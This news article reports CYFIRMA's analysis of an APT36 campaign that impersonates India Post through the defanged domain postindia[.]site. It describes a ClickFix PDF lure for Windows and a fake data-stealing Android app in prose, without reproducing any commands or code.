Public trust in government services becomes the perfect loophole for hackers.
The APT36 group, linked to Pakistan, has launched a malicious campaign disguised as the official website of India Post. The fake domain, postindia[.]site, targets two categories of users — Windows and Android device owners — using separate infection methods: a malicious PDF file and a fake mobile app, respectively.
When accessing the site from a computer, users are prompted to download an "official" document. However, it hides instructions that use the "ClickFix" technique — the victim is asked to press Win + R and paste a PowerShell command into the dialog box. Once executed, the computer connects to an external server and downloads the next stage of the malware. Although the server is no longer active, the file itself is still circulating online.
Metadata from the PDF file identifies the author as “PMYLS,” which may hint at a Pakistani youth laptop distribution initiative. The domain impersonating India Post was registered a month after the PDF was created, in November 2024, confirming the attack was premeditated.
On mobile devices, a different infection method is used. Users are offered an “India Post” app for “convenience,” but in reality it’s a malicious program with elevated privileges. The app collects personal data — contacts, location, and external storage content. It stealthily changes its icon to mimic “Google Accounts,” making detection and removal more difficult.
Special attention was paid to the persistence of the malware — it starts automatically after reboot, ignores battery optimization settings, and can even force-enable required permissions if the user initially denies them.
Researchers from CYFIRMA, who analyzed the campaign, moderately attribute the attack to APT36 — also known as Transparent Tribe. The group is well-known for targeting Indian citizens through a combination of social engineering and exploitation of technical vulnerabilities.
The fact that both PCs and mobile devices are attacked simultaneously highlights the increasingly sophisticated and multi-platform approach of APT groups. The use of fake government-branded apps to distribute malware is particularly alarming given the trust users place in such services.
There is currently no evidence of mass distribution, but the nature of the attack and its selected targets suggest preparations for a broader campaign. Users are advised to be cautious when downloading files or apps from unknown sources, even if they visually resemble official websites.
